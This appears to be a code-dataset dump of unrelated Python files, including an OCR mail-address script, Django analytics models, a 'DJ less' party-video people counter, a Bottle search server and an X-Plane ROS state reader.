id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
3259068 | <gh_stars>1-10
from setuptools import find_packages
from setuptools import setup
with open('README.rst') as f:
readme = f.read()
setup(
name='progeny',
version='0.2.0',
description='Simple but powerful management for complex class hierarchies',
long_description=readme,
url='https://github.com/GoodRx/progeny',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
classifiers=(
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
),
packages=find_packages('src'),
package_dir={
'': 'src',
},
)
| StarcoderdataPython |
3274208 | # import the necessary packages
import cv2
from imutils.perspective import four_point_transform
import pytesseract
import argparse
import imutils
import re
import numpy as np
import io
from PIL import Image, ImageEnhance, ImageFilter
import datetime
from collections import namedtuple
import os
def ocr_code():
# empty output folder
dir = '/home/pi/output'
for f in os.listdir(dir):
os.remove(os.path.join(dir, f))
restart_code = 0
print(datetime.datetime.now())
# in terminal: python ocr.py -i input/mail1.jpg
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image" , required=False, help="path to input image to be OCR'd")
ap.add_argument("-d", "--debug", type=int, default=1, help="whether or not we are visualizing each step of the pipeline")
ap.add_argument("-c", "--min-conf", type=int, default=0, help="minimum confidence value to filter weak text detection")
# check to see if *digit only* OCR should be performed, and if so, update our Tesseract OCR options
# ap.add_argument("-d", "--digits", type=int, default=1, help="whether or not *digits only* OCR will be performed")
# if args["digits"] > 0:
# options = "outputbase digits"
# text = pytesseract.image_to_string(rgb, config=options)
# load the input image from disk
args = vars(ap.parse_args())
if args["image"]:
orig = cv2.imread(args["image"])
else:
orig = cv2.imread("/home/pi/2.jpg") # for our project, the 1.jpg image is the latest image captured
cv2.imwrite("/home/pi/output/0-original.jpg", orig)
# resize input image and compute the ratio of the *new* width to the *old* width
image = orig.copy()
image = imutils.resize(image, width=600)
ratio = orig.shape[1] / float(image.shape[1])
# convert the image to grayscale, blur it, and apply edge detection to reveal the outline of the input image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray, (5, 5), 0)
edged = cv2.Canny(blurred, 30, 150) # or try cv2.Canny(blurred, 75, 200)
# save outputs for troubleshooting
# (NOT USED) if args["debug"] == 1:
cv2.imwrite("/home/pi/output/1-gray.jpg", gray)
cv2.imwrite("/home/pi/output/2-blurred.jpg", blurred)
cv2.imwrite("/home/pi/output/3-edged.jpg", edged)
# ================================================ IMAGE OUTLINE =============================================
# detect contours in the edge map, sort them by size (in descending order), and grab the largest contours
# Use a copy of the image e.g. edged.copy() because findContours alters the image
cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:5]
# initialize a contour that corresponds to the input image outline
contours = None
# loop over the contours
for c in cnts:
# approximate the contour
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.02 * peri, True)
# if this is the first contour we've encountered that has four vertices, then we can assume we've found the input image
if len(approx) == 4:
contours = approx
break
height, width, channels = image.shape
# if the input image contour is empty then our script could not find the outline of the item
if contours is None:
# raise Exception(("Could not find receipt outline. Try debugging your edge detection and contour steps."))
print("\nCould not find outline.") # "Try debugging your edge detection and contour steps."
# If no contours are found, assume the boundary is the contour so that we have some output
contours = np.array([[[0, 0]],[[0, height]],[[width, height]],[[width, 0]]], dtype=np.int32)
# Add a padding to improve OCR on text close to edges
padding = 5
contours[0][0][0] = contours[0][0][0] - padding # max(0, contours[0][0][0] - padding)
contours[0][0][1] = contours[0][0][1] - padding # max(0, contours[0][0][1] - padding)
contours[1][0][0] = contours[1][0][0] - padding # max(0, contours[1][0][0] - padding)
contours[1][0][1] = contours[1][0][1] + padding # min(height, contours[1][0][1] + padding)
contours[2][0][0] = contours[2][0][0] + padding # min(width, contours[2][0][0] + padding)
contours[2][0][1] = contours[2][0][1] + padding # min(height, contours[2][0][1] + padding)
contours[3][0][0] = contours[3][0][0] + padding # min(width, contours[3][0][0] + padding)
contours[3][0][1] = contours[3][0][1] - padding # max(0, contours[3][0][1] - padding)
print("\nSo we continue assuming the full image needs to be OCR'ed.")
print("\nContours: \n", contours)
# print("Contour Shape: ", contours.shape)
# print(type(contours),contours.dtype)
# draw the contour of the input image on the image
outline = image.copy()
cv2.drawContours(outline, [contours], -1, (0, 255, 0), 2) # -1 signifies drawing all contours
cv2.imwrite("/home/pi/output/4-outline.jpg", outline)
# apply a four-point perspective transform to the *original* image to obtain a top-down bird's-eye view of the input image
card = four_point_transform(orig, contours.reshape(4, 2) * ratio)
cv2.imwrite("/home/pi/output/5-transformed.jpg", card)
# convert the input image from BGR to RGB channel ordering
rgb = cv2.cvtColor(card, cv2.COLOR_BGR2RGB)
cv2.imwrite("/home/pi/output/6-rgb.jpg", rgb)
# Enhance image to get clearer results from image_to_text
enhancedimage = Image.open("/home/pi/output/6-rgb.jpg")
# enhancedimage = enhancedimage.convert('L')
enhancedimage = enhancedimage.convert("RGBA")
newimdata = []
datas = enhancedimage.getdata()
for item in datas:
if item[0] < 220 or item[1] < 220 or item[2] < 220:
newimdata.append(item)
else:
newimdata.append((255, 255, 255))
enhancedimage.putdata(newimdata)
enhancedimage = enhancedimage.filter(ImageFilter.MedianFilter()) # a little blur
enhancer = ImageEnhance.Contrast(enhancedimage)
enhancedimage = enhancer.enhance(2)
enhancer = ImageEnhance.Sharpness(enhancedimage)
enhancedimage = enhancer.enhance(2)
# Convert image to black and white
enhancedimage = enhancedimage.convert('1')
enhancedimage.save("/home/pi/output/7-enhanced.jpg")
# ================================================ BACKUP ====================================================
# use Tesseract to OCR the image
# text_full_for_backup = pytesseract.image_to_string(enhancedimage)
# print("\nRAW OUTPUT")
# print("=============")
# print(text_full_for_backup)
# backup_text = open('/home/pi/output/backup.txt', 'w+')
# backup_text.writelines([str(datetime.datetime.now()),"\n"])
# backup_text.writelines(text_full_for_backup)
# backup_text.close()
# # (NOT USED) Clean up text: strip out non-ASCII text from text because OpenCV replaces each unknown character with a ?
# # text = "".join([c if ord(c) < 128 else "" for c in text]).strip()
# # ================================= SPLITTING SENDER vs RECEIVER LOCATIONS =====================================
print("\nTrying to OCR original image.")
# # create a named tuple which we can use to create locations of the input document which we wish to OCR
OCRLocation = namedtuple("OCRLocation", ["id", "bbox", "filter_keywords"])
# # "bbox": Bounding box coordinates use the order [x, y, w, h] where x and y are the top-left coordinates, and w and h are the width and height
# # "filter_keywords": A list of words that we do not wish to consider for OCR
while restart_code < 8 : # We are looping our code so that we can try
# restart_code = 0: Use RGB image
# restart_code = 1: Use enhanced image
# restart_code = 2: Rotate RGB image 90 CW
# restart_code = 3: Rotate RGB image 90 CCW
# restart_code = 4: Rotate RGB image 180
# restart_code = 5: Rotate enhanced image 90 CW
# restart_code = 6: Rotate enhanced image 90 CCW
# restart_code = 7: Rotate enhanced image 180
if restart_code == 0:
enhancedimage = cv2.imread("/home/pi/output/6-rgb.jpg")
elif restart_code == 1:
print("OCR failed. Trying again with enhanced image (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/7-enhanced.jpg")
elif restart_code == 2:
print("OCR failed. Trying again with 90 CW rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/6-rgb.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_90_CLOCKWISE)
elif restart_code == 3:
print("OCR failed. Trying again with 90 CCW rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/6-rgb.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif restart_code == 4:
print("OCR failed. Trying again with 180 rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/6-rgb.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_180)
elif restart_code == 5:
print("OCR failed. Trying again with 90 CW rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/7-enhanced.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_90_CLOCKWISE)
elif restart_code == 6:
print("OCR failed. Trying again with 90 CCW rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/7-enhanced.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif restart_code == 7:
print("OCR failed. Trying again with 180 rotation (code ", restart_code, ")\n")
enhancedimage = cv2.imread("/home/pi/output/7-enhanced.jpg")
enhancedimage = cv2.rotate(enhancedimage, cv2.ROTATE_180)
cv2.imwrite("/home/pi/output/8-locations.jpg", enhancedimage)
height, width, channels = enhancedimage.shape
# define the locations of each area of the document we wish to OCR
# sender_start_point = (0, 0)
# sender_end_point = (int(width/2), int(height/4))
# receiver_start_point = (0, int(height/4))
# receiver_end_point = (int(width), int(height)) # end point - not distance from start (like bbox)
OCR_LOCATIONS = [
OCRLocation("sender", (0, 0, int(width/2), int(height/3)), ["sender", "name", "address"]),
OCRLocation("receiver", (0, int(height/3), int(width), int(height*2/3)), ["receiver", "name", "address"]),
]
# initialize a results list to store the document OCR parsing results
parsingResults = []
if restart_code == 1:
# before you start OCR_locations for rotated image, save a backup of original image in case unable to OCR so we can see what original OCR locations to determine why it failed
cv2.imwrite("/home/pi/output/8a-RGBlocations.jpg", boundinglocations)
if restart_code == 2:
# before you start OCR_locations for rotated image, save a backup of original image in case unable to OCR so we can see what original OCR locations to determine why it failed
cv2.imwrite("/home/pi/output/8b-enhancedlocations.jpg", boundinglocations)
if restart_code == 3:
# before you start OCR_locations for rotated image, save a backup of original image in case unable to OCR so we can see what original OCR locations to determine why it failed
cv2.imwrite("/home/pi/output/8c-rotatedCWlocations.jpg", boundinglocations)
if restart_code == 4:
# before you start OCR_locations for rotated image, save a backup of original image in case unable to OCR so we can see what original OCR locations to determine why it failed
cv2.imwrite("/home/pi/output/8d-rotatedCCWlocations.jpg", boundinglocations)
# loop over the locations of the document we are going to OCR
for loc in OCR_LOCATIONS:
# extract the OCR ROI from the aligned image
locationsimage = cv2.imread("/home/pi/output/8-locations.jpg")
(x, y, w, h) = loc.bbox
# draw outline on main image for reference
boundinglocations = cv2.rectangle(locationsimage, (x, y), (x + w, y + h), (0, 0, 255), 5) # cv2.rectangle(image, start_point, end_point, color, thickness)
# save image that shows OCR locations
cv2.imwrite("/home/pi/output/8-locations.jpg", boundinglocations)
roi = locationsimage[y:y + h, x:x + w]
# OCR the ROI using Tesseract
text = pytesseract.image_to_string(roi)
# break the text into lines and loop over them
for line in text.split("\n"):
# if the line is empty, ignore it
if len(line) == 0:
continue
# convert the line to lowercase and then check to see if the line contains any of the filter keywords (these keywords are part of the *form itself* and should be ignored)
lower = line.lower()
count = sum([lower.count(x) for x in loc.filter_keywords])
# if the count is zero then we know we are *not* examining a text field that is part of the document itself (ex., info, on the field, an example, help text, etc.)
if count == 0:
# update our parsing results dictionary with the OCR'd text if the line is *not* empty
parsingResults.append((loc, line))
# print(parsingResults)
# initialize a dictionary to store our final OCR results
results = {}
# loop over the results of parsing the document
for (loc, line) in parsingResults:
# grab any existing OCR result for the current ID of the document
r = results.get(loc.id, None)
# if the result is None, initialize it using the text and location namedtuple (converting it to a dictionary as namedtuples are not hashable)
if r is None:
results[loc.id] = (line, loc._asdict())
# otherwise, there exists an OCR result for the current area of the document, so we should append our existing line
else:
# unpack the existing OCR result and append the line to the existing text
(existingText, loc) = r
text = "{}\n{}".format(existingText, line)
# update our results dictionary
results[loc["id"]] = (text, loc)
# print(results)
OCR_text = []
for (locID, result) in results.items():
# unpack the result tuple
(text, loc) = result
# # display the OCR result to our terminal
# print(loc["id"])
# print("=" * len(loc["id"]))
# print("{}\n\n".format(text))
OCR_text.append(loc["id"])
OCR_text.append("{}\n\n".format(text))
# print("\n", OCR_text)
sender_content = OCR_text[1]
# print(sender_content)
receiver_content = OCR_text[3]
# print(receiver_content)
# ========================================= REGULAR EXPRESSIONS =============================================
# test regex with https://regexr.com/
# regex commands are https://www.w3schools.com/python/python_regex.asp
# # use regular expressions to parse out names
# nameExp = r"^[\w'\-,.][^0-9_!¡?÷?¿/\\+=@#$%ˆ&*(){}|~<>;:[\]]{2,}"
# nameExp = r"\b([A-Z]\w+)\b" # Gets all words
nameExp = r"\b([A-Z]\w+(?=[\s\-][A-Z])(?:[\s\-][A-Z]\w+)+)\b"
sender_names = re.findall(nameExp, sender_content)
# print("\nSender Names: ", sender_names)
receiver_names = re.findall(nameExp, receiver_content)
# print("\nReceiver Names: ", receiver_names)
# # use regular expressions to parse out mailing addresses
# # mailExp = r"\d{1,4}( \w+){1,5}, (.*), ( \w+){1,5}, (.*), [0-9]{5}(-[0-9]{4})?"
mailExp = r"\d{1,4} [\w\s'\-,.]{1,} [0-9]{5}?"
sender_addr = re.findall(mailExp, sender_content)
# print("\nSender Addr: ", sender_addr)
receiver_addr = re.findall(mailExp, receiver_content)
# print("\nReceiver Addr: ", receiver_addr)
print("\nSender Name: ")
# # loop over the detected name and print them to our terminal
# for name in names:
# print(name.strip())
if sender_names:
sender_name_var = sender_names[0].strip()
else:
sender_name_var = "NONE"
print(sender_name_var)
print("\nSender Address: ")
# # loop over the detected mailing addresses and print them to our terminal
# for addr in mail_addresses:
# print(addr.strip())
if sender_addr:
sender_addr_var = sender_addr[0]
restart_code = 8 # so that loop breaks
else:
sender_addr_var = "NONE"
restart_code += 1
print(sender_addr_var)
print("\nReceiver Name: ")
if receiver_names:
receiver_name_var = receiver_names[0].strip()
else:
receiver_name_var = "NONE"
print(receiver_name_var)
print("\nReceiver Address: ")
if receiver_addr:
receiver_addr_var = receiver_addr[0]
else:
receiver_addr_var = "NONE"
print(receiver_addr_var)
print("\n")
# # use regular expressions to parse out phone numbers
# phoneNums = re.findall(r'[\+\(]?[1-9][0-9 .\-\(\)]{8,}[0-9]', text)
# # loop over the detected phone numbers and print them to our terminal
# print("PHONE NUMBERS")
# for num in phoneNums:
# print(num.strip())
# # use regular expressions to parse out email addresses
# emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", text)
# # loop over the detected email addresses and print them to our terminal
# print("EMAILS")
# for email in emails:
# print(email.strip())
# Write outputs to files
OCR_text_file = open('/home/pi/output/OCR_text.txt', 'w+')
OCR_text_file.writelines([str(datetime.datetime.now())])
OCR_text_file.writelines(["\nSender Name: ", sender_name_var])
OCR_text_file.writelines(["\nSender Address: ", sender_addr_var])
OCR_text_file.writelines(["\nReceiver Name: ", receiver_name_var])
OCR_text_file.writelines(["\nReceiver Address: ", receiver_addr_var])
OCR_text_file.close()
receiver_text = open('/home/pi/output/receiver.txt', 'w+')
receiver_text.writelines(receiver_name_var)
receiver_text.close()
if __name__ == '__main__':
ocr_code() | StarcoderdataPython |
1788249 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import requests
from django.conf import settings
from django.db import models
from django.core.exceptions import ValidationError
from solo.models import SingletonModel
from django_datajsonar.models import AbstractTask
class Query(models.Model):
"""Registro de queries exitosas, guardadas con el propósito de analytics"""
class Meta:
verbose_name_plural = "Tabla consultas"
ids = models.TextField()
args = models.TextField()
timestamp = models.DateTimeField()
ip_address = models.CharField(max_length=200, null=True)
params = models.TextField()
api_mgmt_id = models.IntegerField(blank=True, null=True, unique=True)
uri = models.TextField(default='')
status_code = models.IntegerField(default=0)
user_agent = models.TextField(default='')
request_time = models.DecimalField(max_digits=30, decimal_places=25, default=0)
def __unicode__(self):
return u'Query at %s: %s' % (self.timestamp, self.ids)
class ImportConfig(SingletonModel):
class Meta:
verbose_name = "Configuración de importación de analytics"
SCRIPT_PATH = settings.IMPORT_ANALYTICS_SCRIPT_PATH
endpoint = models.URLField()
token = models.CharField(max_length=64)
kong_api_id = models.CharField(max_length=64)
last_cursor = models.CharField(max_length=64, blank=True)
def clean(self):
status_code = requests.head(
self.endpoint,
headers={'Authorization': 'Token {}'.format(self.token)}
).status_code
if status_code != 200:
raise ValidationError('URL / Token inválido')
def get_results(self, from_date=None, to_date=None, limit=1000, offset=0):
"""Wrapper sobre requests para pegarle al endpoint configurado"""
return requests.get(
self.endpoint,
headers=self.get_authorization_header(),
params={'from_date': from_date,
'to_date': to_date,
'limit': limit,
'offset': offset,
'kong_api_id': self.kong_api_id}
).json()
def get_authorization_header(self):
"""Devuelve el header de auth formateado para usar en la libreria de requests"""
return {'Authorization': 'Token {}'.format(self.token)}
class AnalyticsImportTask(AbstractTask):
class Meta:
verbose_name_plural = "Corridas de importación de analytics"
verbose_name = "Corrida de importación de analytics"
class HitsIndicator(models.Model):
class Meta:
verbose_name = 'Consultas por día de serie'
verbose_name_plural = 'Consultas por día de series'
unique_together = ('serie_id', 'date', )
serie_id = models.CharField(max_length=64)
date = models.DateField()
hits = models.IntegerField()
| StarcoderdataPython |
3317229 | <gh_stars>0
import unittest
from rolling_registry import RollingRegistry
#from my_sum import sum
class RollingRegistryTest(unittest.TestCase):
def test_empty_rolling_registry(self):
registry = RollingRegistry(3)
self.assertEqual(registry.last(), None)
self.assertEqual(registry.size(), 0)
self.assertEqual(registry.average(), 0)
def test_non_empty_rolling_registry(self):
registry = RollingRegistry(4)
registry.add(1)
registry.add(2)
self.assertEqual(registry.last(), 2)
self.assertEqual(registry.size(), 2)
self.assertEqual(registry.average(), 1.5)
def test_overflowing_rolling_registry(self):
registry = RollingRegistry(4)
registry.add(1)
registry.add(2)
registry.add(3)
registry.add(4)
registry.add(5)
self.assertEqual(registry.last(), 5)
self.assertEqual(registry.size(), 4)
self.assertEqual(registry.average(), 3.5)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1650729 | from credential import Credential
class User:
"""
A class for user credentials
"""
users_list = []
user_credentials = []
def __init__(self, username, userpassword):
'''
Properties of the user
'''
self.username = username
self.userpassword = <PASSWORD>
def register(self):
'''
Class Method that saves a new credentials created by new user
'''
User.users_list.append(self)
@classmethod
def save_credent_user(cls, credent):
'''
An instance to save a credential for a user
'''
@classmethod
def login_checker(cls, username, userpassword):
'''
Method that confirms the entry of the user if already registered and then allows him/her to log in
'''
for user in User.users_list:
if user.username == username and user.userpassword == <PASSWORD>:
return user
return False
@classmethod
def display_users(cls):
return cls.users_list
| StarcoderdataPython |
1734171 | <gh_stars>1-10
from . import json_serialiser
from . import time_util | StarcoderdataPython |
172176 | from os import path
import click
import contxt.schemas as schemas
from contxt.services.base_graph_service import BaseGraphService
from contxt.utils.contxt_environment import ContxtEnvironment
@click.command()
@click.option('--fresh-from-file', type=str, help='Overwrite/init from a specific environment file')
def init(fresh_from_file: str):
"""Initialize all schemas"""
if fresh_from_file:
print(f'Loading fresh config from file: {fresh_from_file}')
config = ContxtEnvironment(filename=fresh_from_file)
config.rewrite_to_default_file()
print('Config file has been initialized')
print('Updating schemas')
config = ContxtEnvironment()
schema_dir = path.dirname(schemas.__file__)
for env in config.config.get_graph_environments_for_current_context():
base_graph = BaseGraphService(env, load_schema=False)
base_graph.update_schema(service_name=env.service, base_file_path=schema_dir)
| StarcoderdataPython |
63947 | import pytest
def test_import_pipeline():
import kcwidrp.pipelines.kcwi_pipeline
| StarcoderdataPython |
4814454 | <reponame>DjLess/Dj-less-main<gh_stars>0
"""
Welcome to Dj less source code, here you will find everything that you need to understand the way dj less works
to this time,
this code was made only for data.csv provided from virtual serato's console. In the future our intention
it's to made this for all kind of history archives from any kind of Dj interface program or controller.
For the easy comprehension of the code it gonna be tag whit a "#" before every chunk to explain what its going on.
"""
#>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# 1) SET UP
#Ignore future warning from cvlib
def ignore():
#trhis module ise used to irgnore warnings msgs
from warnings import simplefilter
simplefilter(action='ignore', category=FutureWarning)
ignore()
#Import packages
import cvlib as cv
import cv2
import numpy as np
import mysql.connector
import pandas as pd
import numpy as np
import csv
#Enable connection whit sql server
#Note, you should create a sql server and enable conection
mydb = mysql.connector.connect(
host="localhost",
user="root",
passwd="<PASSWORD>",
database="music_db"
)
mycursor = mydb.cursor()
#>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# 2) READ MUSIC FILE.csv provided from controller program
print("Welcome to DJ less.v0")
print("step1 - Read musica data")
# 2.1 Read text archive
try:
#musicain = input("Write the name or the source of the archive that you wish to Analaize: ")
musicain = "example_history.csv"
musica = pd.read_csv(musicain)
except FileNotFoundError:
print("Error en el nombre o la ruta del archivo")
raise()
# 2.2 Prepare data.
print("step 2 - Edit data")
# 2 Edit text archive
mycursor.execute("SELECT MAX(party_id) AS maximum FROM music")
result = mycursor.fetchall()
for i in result:
n= (i[0])
try:
musica['party_id'] = n+1
except:
musica['party_id'] = 1
#musica['party_type'] = input("write the genre of the party: ")
musica['party_type'] = ("edm party")
musica['position'] = np.arange(len(musica)) #add a column of relative position to the list
musica = musica.reindex(columns=['party_id', 'position', 'name', 'year', 'bpm', 'key', 'start time', 'end time', 'playtime', 'party_type']) #re-arrange and add mising rows if not in file
musica.fillna(0, inplace=True) # fill "Nan" data whit 0's
musica1 = musica[1:]
musica1 = musica1.values.tolist() # convert list to a string
# 2.2.2 Add a relative time column to music
'''
Create two time column one as a string and other as a time delta.
'''
import datetime as dt
from datetime import datetime, date
vacio = datetime.strptime(('00:00:00'), '%H:%M:%S').time()
inicio = datetime.strptime(musica1[0][6], '%H:%M:%S').time()
fin = datetime.strptime(musica1[len(musica1)-1][6], '%H:%M:%S').time()
duracion = datetime.combine(date.today(), fin) - datetime.combine(date.today(), inicio)
a = datetime.combine(date.today(), inicio) - datetime.combine(date.today(), inicio)
time=[a]
time1 = [['00:00:00']]
# Note: on this step we are arranging our time colummn every 10 seconds, it can be modified by changing "minutes and seoncs"
# values below, thanks to this we can have our data arranged by second of the party (vital information)
while a < ((duracion) + dt.timedelta(minutes=0)):
a = a + dt.timedelta(seconds=10)
time.append(a)
time1.append([str((dt.datetime.combine(dt.date(1,1,1),vacio) + a).time())])
'''
To make easier the count, time delta frame list time are converted to seconds, in this way it is easier to know
wich one is greater and isn't necessary to make other transformations when we start to analise the video
'''
# 2.2.3 time to time_second
# (note: time_second store
x=0
time_second=[]
while x < len(time):
a = time[x].total_seconds()
time_second.append(int(a))
x+=1
# 2.2.4 Indicate the key seconds on the music (when every song has started relatively)
x=0
key_second=[]
while x < len(musica1):
a = datetime.combine(date.today(), datetime.strptime(musica1[x][6], '%H:%M:%S').time()) - datetime.combine(
date.today(), datetime.strptime(musica1[0][6], '%H:%M:%S').time())
secondsa = int(a.total_seconds())
key_second.append(secondsa)
x+=1
# 2.2.5 Put music and time columns togheter
repeat=0
x=0
count=0
while repeat < (len(time_second)):
if count < len(key_second):
if time_second[x]== 0:
time1[x].extend(musica1[count])
#print(time1[x])
x+=1
repeat+=1
elif time_second[x] < key_second[count]:
time1[x].extend(musica1[count])
#print(time1[x])
x+=1
repeat+=1
else:
count+=1
else:
count=len(key_second)
time1[x].extend(musica1[count-1])
#print(time1[x])
x+=1
repeat+=1
musica2=time1
#>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# 3) Detect images
print("step 3 - Detect persons")
# 3.1 Open video
webcam = cv2.VideoCapture('tokyo_walk.mp4')
if not webcam.isOpened():
print("Could not open webcam")
exit()
# 3.2 loop through frames
fps = int(webcam.get(cv2.CAP_PROP_FPS))
count = 0
count_list = 0
npersons=[]
while webcam.isOpened():
# read frame from webcam
try:
status, frame = webcam.read()
if count%(time_second[count_list]*fps) == 0 :
#notice that we are using time_second column to pick the frames so we dont analise the whole video
if not status:
print("End of the video")
# apply face detection
try:
bbox, label, conf = cv.detect_common_objects(frame)
npersons.append(label)
print(npersons)
count_list=len(npersons)
except:
webcam.release()
count+=1
except ZeroDivisionError:
status, frame = webcam.read()
if count ==0:
# apply face detection
bbox, label, conf = cv.detect_common_objects(frame)
npersons.append(label)
print(str(npersons) + "this is frame 1")
count_list = len(npersons)
count += 1
except IndexError:
webcam.release()
# 3.3 Create a column whit only number of persons detected trough the analysis
try:
npersons_1 =[]
x=0
while x<= len(npersons):
npersons_1.append(int((npersons[x].count('person'))))
x+=1
except:
pass
cv2.destroyAllWindows()
# 3.4 Add the column of number of person detected to our main list
x=0
while x < len(musica2):
musica2[x].append(npersons_1[x])
x+=1
for row in musica2:
print(row)
#>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# Copy data into data base
print("step 4 - copy data into server")
sqlFormula = "INSERT INTO music (second, party_id, position, song_name, year, song_bpm, song_key, start_time, end_time, playtime, party_type, number_of_people) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
mycursor.executemany(sqlFormula, musica2)
mydb.commit()
print("sucefull copy!!")
print("bye!")
| StarcoderdataPython |
3382513 | <filename>src/dipus/websetup.py<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import logging
from bottle import Bottle, route, run, request, response, abort
from bottle import Jinja2Template
from bottle import static_file
# increase POST request body size
import bottle
bottle.BaseRequest.MEMFILE_MAX = 1024 * 1024
import simplejson
import docstore
import config
app = Bottle()
conf = None
def ret_jsonp(request, ret):
json_response = simplejson.dumps(ret)
response.content_type = 'application/json; charset=utf-8'
callback_function = request.GET.get('callback')
if callback_function:
json_response = ''.join([callback_function, '(', json_response, ')'])
return json_response
def auth(password):
''' not implemented yet '''
return True
@app.route('/')
def index():
distdir = os.path.dirname(os.path.abspath(__file__))
tpl = os.path.join(distdir, '_templates/index.tpl')
return Jinja2Template(name=tpl).render(var='var')
@app.route('/favicon.ico')
def favicon():
pass
@app.route('/_static/<filename:path>')
def static_files(filename):
distdir = os.path.dirname(os.path.abspath(__file__))
static_dir = os.path.join(distdir, '_static')
return static_file(filename, root=static_dir)
@app.route('/_list/')
def listindex():
''' return index list '''
password = request.forms.get('password')
if auth(password) is False:
abort(403)
ret = {
"list": docstore.listindex(conf.indexroot)
}
return ret_jsonp(request, ret)
@app.route('/<_index>', method='POST')
def updateDocument(_index):
password = request.forms.get('password')
if auth(password) is False:
abort(403)
path = request.forms.get('path')
if not path:
abort(400, "path is not set")
message = request.forms.get('message')
if not message:
abort(400, "message is not set")
title = request.forms.get('title')
if not title:
title = ""
doc_url = request.forms.get('doc_url')
if not doc_url:
doc_url = ""
posted = {
'_index': _index.decode('utf-8'),
'path': path.decode('utf-8'),
'message': message.decode('utf-8'),
'title': title.decode('utf-8'),
'doc_url': doc_url.decode('utf-8')
}
ret = docstore.register(posted, conf.indexroot)
return simplejson.dumps(ret)
@app.route('/_msearch/')
def multisearch():
password = request.forms.get('password')
if auth(password) is False:
abort(403) # forbidden
query = request.query.get('q')
indexes = request.query.get('indexes')
if query is None or indexes is None or len(indexes) == 0:
abort(400, "query or indexes is not set")
results = []
total = 0
for idx in indexes.split(","):
if idx in docstore.listindex(conf.indexroot):
s_r = docstore.search(idx, query, conf.indexroot)
for r in s_r: # flatten
results.append(r)
total += len(s_r)
ret = {
"total": total,
"hits": results
}
return ret_jsonp(request, ret)
@app.route('/<_index>/_search')
def query(_index):
password = request.forms.get('password')
if auth(password) is False:
abort(403)
query = request.query.get('q')
results = docstore.search(_index, query, conf.indexroot)
ret = {
"total": len(results),
"hits": results
}
return ret_jsonp(request, ret)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Dipus: simple full-text search server')
parser.add_argument('-c', '--config', nargs='?',
dest='conffile', action='store',
help='Config file path')
args = parser.parse_args()
conf = config.Config(args.conffile)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(message)s')
run(app,
host=conf.host, port=conf.port,
reloader=True)
| StarcoderdataPython |
1670029 | import xpc.xpc as xpc
import rospy
import xplane_ros.msg as xplane_msgs
import rosplane_msgs.msg as rosplane_msgs
from geometry_msgs.msg import Twist
from geometry_msgs.msg import Pose, PoseStamped
from nav_msgs.msg import Odometry
from std_msgs.msg import Float32
from geometry_msgs.msg import Quaternion
from tf.transformations import quaternion_from_euler
import numpy as np
KNOTS_TO_MS = 0.51444444444
MS_TO_FPM = 60.0/0.305
angle_in_deg = True
'''Class to extract position and controls related information from XPlane '''
class StateReader:
def __init__(self, client):
'''instantiate connection to XPC'''
#self.client = xpc.XPlaneConnect()
self.client = client
self.initPose = Pose()
self.initPose.position.x = None
self.initPose.position.y = None
self.initPose.position.z = None
# Publish global state consisting of GlobalState msg (Latitutde Longitude instead of openGL coordinates)
self.globalStatePub = rospy.Publisher("/xplane/flightmodel/global_state", xplane_msgs.GlobalState, queue_size = 10)
self.odomPub = rospy.Publisher("/xplane/flightmodel/odom", Odometry, queue_size=10) # Odometry is also being provided in the NED format : XYZ <-> NED
# self.posePub = rospy.Publisher("/xplane/flightmodel/pose", Pose, queue_size=10)
# self.velPub = rospy.Publisher("/xplane/flightmodel/velocity", Twist, queue_size=10)
'''Publisher for data in rosplane format'''
self.statePub = rospy.Publisher("/fixedwing/xplane/state", rosplane_msgs.State, queue_size=10)
# self.diff_pub = rospy.Publisher("/xplane/height_diff", Float32, queue_size=10 )
self.transformPub = rospy.Publisher("/xplane/flightmodel/my_transform", xplane_msgs.TransformedPoint, queue_size=10)
self.odom = Odometry()
def sensor_update(self):
# get global position information from XPlane
